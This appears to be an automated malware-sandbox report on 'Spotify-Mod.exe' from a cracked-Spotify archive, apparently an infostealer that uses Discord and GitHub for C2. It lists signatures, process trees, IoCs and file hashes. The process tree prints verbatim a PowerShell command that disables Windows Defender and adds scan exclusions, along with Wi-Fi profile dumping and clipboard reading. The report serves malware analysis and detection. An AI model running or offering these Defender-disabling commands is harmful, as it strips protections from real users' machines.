Analysis
-
max time kernel
146s -
max time network
151s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
21/05/2024, 18:16
Behavioral task
behavioral1
Sample
cracked-premium-spotify.rar
Resource
win11-20240508-en
Behavioral task
behavioral2
Sample
Spotify-Mod.exe
Resource
win11-20240508-en
Behavioral task
behavioral3
Sample
Spotify-Mod.pyc
Resource
win11-20240419-en
General
-
Target
Spotify-Mod.exe
-
Size
26.1MB
-
MD5
1228d25f5999f30e525ad94a791f0533
-
SHA1
4c88fc73745428ba90de79ae5c045fed5dcbf48c
-
SHA256
6e01da3a7bf0a42d5a29e7dbc7a0d64922dc276b747964f4371c8bd63c1627a7
-
SHA512
a7d7eeae8e7ee959f9878598829c29c76108f2a8b56dfbc57d4b71a03febaead8765b07ff0682d440d7815853ecaf9474c3b948eece2d0e3710b08eb9dae7fd4
-
SSDEEP
393216:av90+5YjOfXh2Jp5MwurEUWjAtEh/1tSRtyV+da:M9PKjEhidb+O1QRt4+da
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 564 powershell.exe 4936 powershell.exe 5108 powershell.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Spotify-Mod.exe Spotify-Mod.exe -
Loads dropped DLL 50 IoCs
pid Process 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000100000002aa28-91.dat upx behavioral2/memory/5092-95-0x00007FFD982E0000-0x00007FFD989B9000-memory.dmp upx behavioral2/files/0x000100000002aa00-97.dat upx behavioral2/files/0x000100000002aa22-102.dat upx behavioral2/files/0x000100000002a9fe-104.dat upx behavioral2/memory/5092-106-0x00007FFDB3830000-0x00007FFDB383F000-memory.dmp upx behavioral2/files/0x000100000002aa03-108.dat upx behavioral2/memory/5092-111-0x00007FFDA9F00000-0x00007FFDA9F2D000-memory.dmp upx behavioral2/memory/5092-110-0x00007FFDB3450000-0x00007FFDB3469000-memory.dmp upx behavioral2/memory/5092-105-0x00007FFDA9F30000-0x00007FFDA9F55000-memory.dmp upx behavioral2/files/0x000100000002aa21-112.dat upx behavioral2/files/0x000100000002aa0b-130.dat upx behavioral2/files/0x000100000002aa09-128.dat upx behavioral2/files/0x000100000002aa08-127.dat upx behavioral2/files/0x000100000002aa07-126.dat upx behavioral2/files/0x000100000002aa06-125.dat upx behavioral2/files/0x000100000002aa05-124.dat upx behavioral2/files/0x000100000002aa04-123.dat upx behavioral2/files/0x000100000002aa02-122.dat upx behavioral2/files/0x000100000002aa01-121.dat upx behavioral2/files/0x000100000002a9ff-120.dat upx behavioral2/files/0x000100000002a9fd-119.dat upx behavioral2/files/0x000100000002aa2d-117.dat upx behavioral2/files/0x000100000002aa2c-116.dat upx behavioral2/files/0x000100000002aa2b-115.dat upx behavioral2/files/0x000100000002aa26-114.dat upx behavioral2/files/0x000100000002aa23-113.dat upx behavioral2/memory/5092-132-0x00007FFDAF670000-0x00007FFDAF67D000-memory.dmp upx behavioral2/memory/5092-136-0x00007FFDAF660000-0x00007FFDAF66D000-memory.dmp upx behavioral2/memory/5092-135-0x00007FFDACE90000-0x00007FFDACEA9000-memory.dmp upx behavioral2/memory/5092-138-0x00007FFDAD120000-0x00007FFDAD12D000-memory.dmp upx behavioral2/memory/5092-142-0x00007FFD97DB0000-0x00007FFD982D9000-memory.dmp upx behavioral2/memory/5092-141-0x00007FFDAA250000-0x00007FFDAA264000-memory.dmp upx behavioral2/memory/5092-146-0x00007FFDA9FA0000-0x00007FFDAA06D000-memory.dmp upx behavioral2/memory/5092-145-0x00007FFDAA070000-0x00007FFDAA0A3000-memory.dmp upx behavioral2/memory/5092-148-0x00007FFDA9F80000-0x00007FFDA9F96000-memory.dmp upx behavioral2/memory/5092-151-0x00007FFDA9F60000-0x00007FFDA9F72000-memory.dmp upx behavioral2/files/0x000100000002aa25-159.dat upx behavioral2/memory/5092-160-0x00007FFDA9580000-0x00007FFDA9598000-memory.dmp upx behavioral2/memory/5092-157-0x00007FFDA9800000-0x00007FFDA9824000-memory.dmp upx behavioral2/memory/5092-156-0x00007FFDA9EC0000-0x00007FFDA9EF5000-memory.dmp upx behavioral2/memory/5092-155-0x00007FFDA5630000-0x00007FFDA57A6000-memory.dmp upx behavioral2/files/0x000100000002aa33-161.dat upx behavioral2/memory/5092-163-0x00007FFDA94A0000-0x00007FFDA9527000-memory.dmp upx behavioral2/memory/5092-154-0x00007FFD982E0000-0x00007FFD989B9000-memory.dmp upx behavioral2/files/0x000100000002aa11-164.dat upx behavioral2/memory/5092-170-0x00007FFDA9400000-0x00007FFDA9427000-memory.dmp upx behavioral2/memory/5092-172-0x00007FFD97AC0000-0x00007FFD97BDB000-memory.dmp upx behavioral2/memory/5092-169-0x00007FFDAA240000-0x00007FFDAA24B000-memory.dmp upx behavioral2/memory/5092-168-0x00007FFDAF670000-0x00007FFDAF67D000-memory.dmp upx behavioral2/files/0x000100000002aa12-167.dat upx behavioral2/files/0x000100000002a9d5-173.dat upx behavioral2/memory/5092-175-0x00007FFDAA100000-0x00007FFDAA10B000-memory.dmp upx behavioral2/files/0x000100000002a9d0-176.dat upx behavioral2/files/0x000100000002a9d1-178.dat upx behavioral2/memory/5092-191-0x00007FFDA9260000-0x00007FFDA926C000-memory.dmp upx behavioral2/memory/5092-190-0x00007FFDA9FA0000-0x00007FFDAA06D000-memory.dmp upx behavioral2/memory/5092-189-0x00007FFDAA070000-0x00007FFDAA0A3000-memory.dmp upx behavioral2/memory/5092-188-0x00007FFDA9290000-0x00007FFDA929C000-memory.dmp upx behavioral2/memory/5092-187-0x00007FFDA9270000-0x00007FFDA927C000-memory.dmp upx behavioral2/memory/5092-186-0x00007FFDA9280000-0x00007FFDA928B000-memory.dmp upx behavioral2/memory/5092-200-0x00007FFDA8F00000-0x00007FFDA8F0C000-memory.dmp upx behavioral2/memory/5092-202-0x00007FFDA9230000-0x00007FFDA923B000-memory.dmp upx behavioral2/memory/5092-201-0x00007FFD97870000-0x00007FFD97AB5000-memory.dmp upx -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 7 discord.com 8 discord.com 1 raw.githubusercontent.com 1 discord.com 3 raw.githubusercontent.com 5 discord.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 api.ipify.org 1 api.ipify.org 2 api.ipify.org -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4984 WMIC.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 4816 PING.EXE 2108 PING.EXE -
Suspicious behavior: EnumeratesProcesses 22 IoCs
pid Process 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 3240 powershell.exe 3240 powershell.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 5092 Spotify-Mod.exe 1448 powershell.exe 1448 powershell.exe 564 powershell.exe 564 powershell.exe 4936 powershell.exe 4936 powershell.exe 5108 powershell.exe 5108 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5092 Spotify-Mod.exe Token: SeIncreaseQuotaPrivilege 3996 WMIC.exe Token: SeSecurityPrivilege 3996 WMIC.exe Token: SeTakeOwnershipPrivilege 3996 WMIC.exe Token: SeLoadDriverPrivilege 3996 WMIC.exe Token: SeSystemProfilePrivilege 3996 WMIC.exe Token: SeSystemtimePrivilege 3996 WMIC.exe Token: SeProfSingleProcessPrivilege 3996 WMIC.exe Token: SeIncBasePriorityPrivilege 3996 WMIC.exe Token: SeCreatePagefilePrivilege 3996 WMIC.exe Token: SeBackupPrivilege 3996 WMIC.exe Token: SeRestorePrivilege 3996 WMIC.exe Token: SeShutdownPrivilege 3996 WMIC.exe Token: SeDebugPrivilege 3996 WMIC.exe Token: SeSystemEnvironmentPrivilege 3996 WMIC.exe Token: SeRemoteShutdownPrivilege 3996 WMIC.exe Token: SeUndockPrivilege 3996 WMIC.exe Token: SeManageVolumePrivilege 3996 WMIC.exe Token: 33 3996 WMIC.exe Token: 34 3996 WMIC.exe Token: 35 3996 WMIC.exe Token: 36 3996 WMIC.exe Token: SeIncreaseQuotaPrivilege 3996 WMIC.exe Token: SeSecurityPrivilege 3996 WMIC.exe Token: SeTakeOwnershipPrivilege 3996 WMIC.exe Token: SeLoadDriverPrivilege 3996 WMIC.exe Token: SeSystemProfilePrivilege 3996 WMIC.exe Token: SeSystemtimePrivilege 3996 WMIC.exe Token: SeProfSingleProcessPrivilege 3996 WMIC.exe Token: SeIncBasePriorityPrivilege 3996 WMIC.exe Token: SeCreatePagefilePrivilege 3996 WMIC.exe Token: SeBackupPrivilege 3996 WMIC.exe Token: SeRestorePrivilege 3996 WMIC.exe Token: SeShutdownPrivilege 3996 WMIC.exe Token: SeDebugPrivilege 3996 WMIC.exe Token: SeSystemEnvironmentPrivilege 3996 WMIC.exe Token: SeRemoteShutdownPrivilege 3996 WMIC.exe Token: SeUndockPrivilege 3996 WMIC.exe Token: SeManageVolumePrivilege 3996 WMIC.exe Token: 33 3996 WMIC.exe Token: 34 3996 WMIC.exe Token: 35 3996 WMIC.exe Token: 36 3996 WMIC.exe Token: SeDebugPrivilege 3240 powershell.exe Token: SeDebugPrivilege 1448 powershell.exe Token: SeDebugPrivilege 564 powershell.exe Token: SeDebugPrivilege 4936 powershell.exe Token: SeDebugPrivilege 5108 powershell.exe Token: SeIncreaseQuotaPrivilege 3716 WMIC.exe Token: SeSecurityPrivilege 3716 WMIC.exe Token: SeTakeOwnershipPrivilege 3716 WMIC.exe Token: SeLoadDriverPrivilege 3716 WMIC.exe Token: SeSystemProfilePrivilege 3716 WMIC.exe Token: SeSystemtimePrivilege 3716 WMIC.exe Token: SeProfSingleProcessPrivilege 3716 WMIC.exe Token: SeIncBasePriorityPrivilege 3716 WMIC.exe Token: SeCreatePagefilePrivilege 3716 WMIC.exe Token: SeBackupPrivilege 3716 WMIC.exe Token: SeRestorePrivilege 3716 WMIC.exe Token: SeShutdownPrivilege 3716 WMIC.exe Token: SeDebugPrivilege 3716 WMIC.exe Token: SeSystemEnvironmentPrivilege 3716 WMIC.exe Token: SeRemoteShutdownPrivilege 3716 WMIC.exe Token: SeUndockPrivilege 3716 WMIC.exe -
Suspicious use of WriteProcessMemory 48 IoCs
description pid Process procid_target PID 4124 wrote to memory of 5092 4124 Spotify-Mod.exe 81 PID 4124 wrote to memory of 5092 4124 Spotify-Mod.exe 81 PID 5092 wrote to memory of 3784 5092 Spotify-Mod.exe 83 PID 5092 wrote to memory of 3784 5092 Spotify-Mod.exe 83 PID 3784 wrote to memory of 3996 3784 cmd.exe 85 PID 3784 wrote to memory of 3996 3784 cmd.exe 85 PID 5092 wrote to memory of 4580 5092 Spotify-Mod.exe 86 PID 5092 wrote to memory of 4580 5092 Spotify-Mod.exe 86 PID 4580 wrote to memory of 712 4580 cmd.exe 88 PID 4580 wrote to memory of 712 4580 cmd.exe 88 PID 5092 wrote to memory of 2596 5092 Spotify-Mod.exe 89 PID 5092 wrote to memory of 2596 5092 Spotify-Mod.exe 89 PID 2596 wrote to memory of 3240 2596 cmd.exe 91 PID 2596 wrote to memory of 3240 2596 cmd.exe 91 PID 5092 wrote to memory of 4476 5092 Spotify-Mod.exe 92 PID 5092 wrote to memory of 4476 5092 Spotify-Mod.exe 92 PID 4476 wrote to memory of 1448 4476 cmd.exe 94 PID 4476 wrote to memory of 1448 4476 cmd.exe 94 PID 4476 wrote to memory of 564 4476 cmd.exe 95 PID 4476 wrote to memory of 564 4476 cmd.exe 95 PID 4476 wrote to memory of 4936 4476 cmd.exe 96 PID 4476 wrote to memory of 4936 4476 cmd.exe 96 PID 4476 wrote to memory of 5108 4476 cmd.exe 97 PID 4476 wrote to memory of 5108 4476 cmd.exe 97 PID 5092 wrote to memory of 4948 5092 Spotify-Mod.exe 98 PID 5092 wrote to memory of 4948 5092 Spotify-Mod.exe 98 PID 4948 wrote to memory of 3716 4948 cmd.exe 100 PID 4948 wrote to memory of 3716 4948 cmd.exe 100 PID 5092 wrote to memory of 868 5092 Spotify-Mod.exe 101 PID 5092 wrote to memory of 868 5092 Spotify-Mod.exe 101 PID 5092 wrote to memory of 3060 5092 Spotify-Mod.exe 103 PID 5092 wrote to memory of 3060 5092 Spotify-Mod.exe 103 PID 3060 wrote to memory of 4984 3060 cmd.exe 105 PID 3060 wrote to memory of 4984 3060 cmd.exe 105 PID 5092 wrote to memory of 1668 5092 Spotify-Mod.exe 106 PID 5092 wrote to memory of 1668 5092 Spotify-Mod.exe 106 PID 1668 wrote to memory of 3480 1668 cmd.exe 108 PID 1668 wrote to memory of 3480 1668 cmd.exe 108 PID 5092 wrote to memory of 2080 5092 Spotify-Mod.exe 109 PID 5092 wrote to memory of 2080 5092 Spotify-Mod.exe 109 PID 2080 wrote to memory of 2700 2080 cmd.exe 111 PID 2080 wrote to memory of 2700 2080 cmd.exe 111 PID 5092 wrote to memory of 3592 5092 Spotify-Mod.exe 112 PID 5092 wrote to memory of 3592 5092 Spotify-Mod.exe 112 PID 3592 wrote to memory of 4816 3592 cmd.exe 114 PID 3592 wrote to memory of 4816 3592 cmd.exe 114 PID 3592 wrote to memory of 2108 3592 cmd.exe 115 PID 3592 wrote to memory of 2108 3592 cmd.exe 115
Processes
-
C:\Users\Admin\AppData\Local\Temp\Spotify-Mod.exe"C:\Users\Admin\AppData\Local\Temp\Spotify-Mod.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4124 -
C:\Users\Admin\AppData\Local\Temp\Spotify-Mod.exe"C:\Users\Admin\AppData\Local\Temp\Spotify-Mod.exe"2⤵
- Drops startup file
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5092 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:3784 -
C:\Windows\System32\wbem\WMIC.exeC:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3996
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profiles"3⤵
- Suspicious use of WriteProcessMemory
PID:4580 -
C:\Windows\system32\netsh.exenetsh wlan show profiles4⤵PID:712
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3240
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "3⤵
- Suspicious use of WriteProcessMemory
PID:4476 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5108
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵
- Suspicious use of WriteProcessMemory
PID:4948 -
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3716
-
-
-
C:\Windows\System32\Wbem\wmic.exewmic cpu get Name3⤵PID:868
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:4984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵PID:3480
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Windows\System32\wbem\WMIC.exeC:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid4⤵PID:2700
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\self_delete.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:3592 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 24⤵
- Runs ping.exe
PID:4816
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 24⤵
- Runs ping.exe
PID:2108
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
91B
MD55aa796b6950a92a226cc5c98ed1c47e8
SHA16706a4082fc2c141272122f1ca424a446506c44d
SHA256c4c83da3a904a4e7114f9bd46790db502cdd04800e684accb991cd1a08ee151c
SHA512976f403257671e8f652bf988f4047202e1a0fd368fdb2bab2e79ece1c20c7eb775c4b3a8853c223d4f750f4192cd09455ff024918276dc1dd1442fa3b36623ad
-
Filesize
23B
MD55638715e9aaa8d3f45999ec395e18e77
SHA14e3dc4a1123edddf06d92575a033b42a662fe4ad
SHA2564db7f6559c454d34d9c2d557524603c3f52649c2d69b26b6e8384a3d179aeae6
SHA51278c96efab1d941e34d3137eae32cef041e2db5b0ebbf883e6a2effa79a323f66e00cfb7c45eb3398b3cbd0469a2be513c3ff63e5622261857eefc1685f77f76b
-
Filesize
10KB
MD5ecb6bcbafea70b91e63bc4d6eac80690
SHA183522cbccc21acd51718fe913b7fe1d9777de134
SHA256a3f98cbaefc4ebf7ad9f6e8eb067b44220a8fa72efa4a6a4b015cdb5aa64c58c
SHA512dbe980884cb88f77d0570dd1306e5a2e625aefbf61cea84b73650ae936cfa720805f02fe6232d3345ef950fc4cd675091b81fce6849f1583e44966ca064dcbb8
-
Filesize
10KB
MD518e0a95c5cfed7c054e36f3508c3ca78
SHA1ae480e982f272f1370f60fa08d7f4772dc003920
SHA256b9941f43c52eed26ffabc190c7b5fff804f1a8dbbdfadd35fc3ab673e7bf2e05
SHA512f817a656529f58732c78cb3bce3db25c8859c176cdbe28056b3f6a13d733f4672bd35166e25ab678d7b8e3239b498e23cfd90ec4be5e906d7b0a093bf83ea1e5
-
Filesize
9KB
MD5988bc44217fde3aaef9b400519a87acd
SHA140d8e43753bd4712e1dd53419fe19ef59044555f
SHA256a4cf8ec5227cd73909defaca13988cc0e8ecea234986fc28d0cdc4b4c239ac84
SHA51245ab5fdda31056e64011655a8e1d6bc37bbc1454614f2c748c84c65400d28820313605636118dca59701418f03f87833780ea4419a57ccf1bae983c5cb03d983
-
Filesize
10KB
MD519a5dcc0f2f46c3bce75a708978dd810
SHA1f6432aa2e0823021322b9a4615bd4b37648361e6
SHA25685fe310f47e417bff3def8ff13ed2c59318e3843efca718414ed4c140c8e7b19
SHA51265cdd4c7b87d187f40bbe433619b0bfa0e49603a8f72b423f548ac551c2f7d2b1686a2f35284813124f6682ed5b712c5d05fd2067a6df815857f9fe9988176d1
-
Filesize
116KB
MD5be8dbe2dc77ebe7f88f910c61aec691a
SHA1a19f08bb2b1c1de5bb61daf9f2304531321e0e40
SHA2564d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83
SHA5120da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655
-
Filesize
48KB
MD5f8dfa78045620cf8a732e67d1b1eb53d
SHA1ff9a604d8c99405bfdbbf4295825d3fcbc792704
SHA256a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5
SHA512ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371
-
Filesize
37KB
MD581b90d80b9e847b2ff4293bf64a2ba72
SHA1ae628535fc54694d2dd453bd2fd53329a4abd464
SHA25618edc6a184a803164769dbf56910a2fe8d6bc9bdc9ea0b7ae20b353ed7990942
SHA512747abdda85dc5d3eb0b31cfaed3cd6b751e66c1c64bcde899558f458ab916ddb06e9f4e3571c2f2fa492adcbffd6c9cd6b043191b6006712a3e2e63e760efd17
-
Filesize
48KB
MD5162e073421e8a6e47f4d11f0de63df28
SHA1d044e3df6952e63a1680b760edc4dc0831398fdc
SHA256f64433f9ac0681e0e26d141c846f7aad938ff6bea7c497da87f68144c5dec67a
SHA51282fe9bcf0c51baed30687ac3f5a48b92a1cc7a53311e6ff8078b625d5b48a270ba8b6e92ad4ae419e9199407f2c7fcf511bde9188d5f06c56a1d4f144b584ea4
-
Filesize
71KB
MD55ecaaa900fdabc7207cf938e23f5d956
SHA140d4d67e8ba1737caa5e0ab69cb08d7f7f4215ae
SHA256b2ee6d811dc1d94a761ffe691006e23ad00adeb9b710c4f8e7d59f177401aaba
SHA512ff03c361adaf5e14101083e9374e8b85f0b74bda2b6c05a0739237b397fa02dbfa8b6b8cadc4ded1d9b64e8ae63d040e1b6ed2cc3947451b6c3f58ed7bfc1cd0
-
Filesize
59KB
MD51edf8e4b75c253f3f6b0b1f9a93f9b71
SHA134d03023f8e382c407740a15127530686f60bf96
SHA256f5b36ebf25552e9e1f54627be56f78f5b14f46725f840d2e6faaf47b16ddb3dc
SHA512b2002a3a3964baa002315fd47604b212956bdd20a0b9c482d4876fd7a923f0a839e5f8c8839c5e8a54d23098bab6eb416323a013daae0a6cebcf916b9ceaa12d
-
Filesize
105KB
MD55c24aef1e8ea173d8232f872fd238439
SHA1f91e6c75b21764af4e285f75818799a1886f3c66
SHA256062cd94a10c527932ccb450039f85dd1e4b4ede0213a9701d02f6792c03bc163
SHA5128bd68b70e7af1bbf10eca668544c5f48375c42cb42552a726d642b1449c416c708423227ef708b0cbfbd5bdf5a2adc58bfd9593524e977f97e72a9d0a199b511
-
Filesize
35KB
MD543ac0eca4b4d7272e7d3eff2e7a49c7a
SHA15974e82997b8344cbab9be644578147d9f8375d9
SHA256ad327af8c1d8d05b03f21b8729640720d77093799ce229149d16db310d978f41
SHA512b6d1f881448de6119c3ccdd3de354dd1d69e5e38584ec599188d66c741ff179989af2c5aed9c98440faccedd98a214d3bb14241f9ac5cd63a67ee7fc2df1ee53
-
Filesize
86KB
MD5173a4e19c3ca16db5ee95bc2fe01016b
SHA164d3259beeb5ac3a59c53796651c0f44ce2c317e
SHA256f8c1c6e0bdcce10df607630255c6908b6870b2c12231f9000073c6728818e2c0
SHA51278da5d71386514e82b27b8ce6a98ba798d6a31a09ea09a3e491aa20e69b198a1110f32c27a9c4ff6ab8ba88f7b0ab2a5ffb6fe724dc7bb277ee794ad486b8d4f
-
Filesize
27KB
MD516ce3efeaa51699f96c3e62aeddfb283
SHA161ae5f4e30bdcc8e9a26671e268d5b94d7e0fbc5
SHA256ae97e6981d72da14c81a48f6a049268fb3ec46ee4631c3dbe719998abe1e0b89
SHA512d8b5dd87b2477ece5b4ffaf882d6a21b43927b26cbc5af4e4052a626195a072a933cba65a2f530b82b4203aab222bc6d885b2e56c9f2622273a69544647bfe24
-
Filesize
33KB
MD51cd935b38fc92de07887ca152bce9f61
SHA1b5cb5bdac60dcf5380e278fca3d3912728091ff7
SHA25619da0a2ba36bdd88aa28cbcb94a9358f116f3a929f3be6edf61e5b59ce27cb48
SHA51250ffc97c563809651019e0ede59c524c97241fe4d365d7e19bb3cb86ba6a3ba07a966653ad5f3444ab5f240335c57540a5f50ca8832508949ffbe9504209812a
-
Filesize
26KB
MD5e882fa7aa3f06040190941ef4681aa63
SHA11ed79a4181272b831716e631c136553645bb40a5
SHA25642dcac31444b071881da3a4d120ae60f3f8c5ad8f4280871ddca5f4a8fb35204
SHA51290c3a832bd35c02d25b7afd10b2bbb48f2a3720a3c77e981fd9de687e6fea443ef07b6398616a6ec33a3e08864da500f73fa4cb980d5d13cf3544d678ad1d5f1
-
Filesize
44KB
MD52e33f3f73ce1e81244afdd0f67ea21d9
SHA1f33f884ad3897b3170c211d5b6896e0bd7e0dc1c
SHA2563583a376a44af5621888cd232ecc7fe3a19f4731268f2f340346fad9931c6393
SHA512fc6bd819573f800c09ac40fea66b3c7fcc42d7b08494d04c51b2be898a6c94780df3e3b98c3e8cf55d2869bf74c26dbd2f72ad08b36bb91c82f47878999ba4fb
-
Filesize
57KB
MD5baae0d07fde6d5d23e0a00f95df04079
SHA114c391c78b7361a25f2e75ff8e726de794e9e9f4
SHA25602d7217fa00d03b5a603b1f8a9282f1ab5512225ab65c673403b51fed0b9fe1e
SHA51274de82b0c6293792df1f4b77d9447a85804f22addb0b3d69723d76be25b49b1e6cf5c86af20e1b03b3af29ff28f7dd68ab84198dd800aa544a9f3e8147bbcf65
-
Filesize
65KB
MD555494fb40eb424482c31cb515cdd3032
SHA16bdd5092554305cd4a1dd006b304ddf4efd86de3
SHA256036bba9f78a7b8c72112a6119f179cde7038263dd19ad5ad2592e191642e5887
SHA51254e6145920c600cc6410d251102d6d6081de61191cb38c1f7d7f4d269aaaa7a032ff04bc08566d44bfc5e7831780694cd2856e10438ccbeddac28d62c8f90e6c
-
Filesize
24KB
MD57a00ff38d376abaaa1394a4080a6305b
SHA1d43a9e3aa3114e7fc85c851c9791e839b3a0ee13
SHA256720e9b68c41c8d9157865e4dd243fb1731f627f3af29c43250804a5995a82016
SHA512ce39452df539eeeff390f260c062a0c902557fda25a7be9a58274675b82b30bddb7737b242e525f7d501db286f4873b901d94e1cd09aa8864f052594f4b34789
-
Filesize
28KB
MD58679733f0b32381d459d7bbeb3d8c160
SHA1605c0429b9afb74afc2c2d39ba4060cb3a492b59
